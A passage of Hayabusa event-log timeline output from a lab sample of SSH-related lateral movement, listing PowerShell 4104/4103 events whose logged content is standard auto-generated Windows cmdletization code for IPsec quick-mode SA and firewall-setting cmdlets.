$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecMainModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeSA' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.859 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetQuickModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeSA' -Alias '*' function Remove-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecMainModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeSA' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.860 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.860 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.860 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecQuickModeSA"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.861 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecQuickModeSA"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.893 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecuritySettingData' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallSetting' -Alias '*' function Set-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetSecuritySettingData')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption] ${Exemptions}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulFtp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulPptp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${RequireFullAuthSupport}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck] ${CertValidationLevel}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT] ${AllowIPsecThroughNAT}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSAIdleTimeSeconds}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding] ${KeyEncoding}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing] ${EnablePacketQueuing}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Exemptions')) { [object]$__cmdletization_value = ${Exemptions} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulFtp')) { [object]$__cmdletization_value = ${EnableStatefulFtp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulPptp')) { [object]$__cmdletization_value = ${EnableStatefulPptp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTransportAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTunnelAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTransportAuthorizationList')) {",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.893 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecuritySettingData' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, 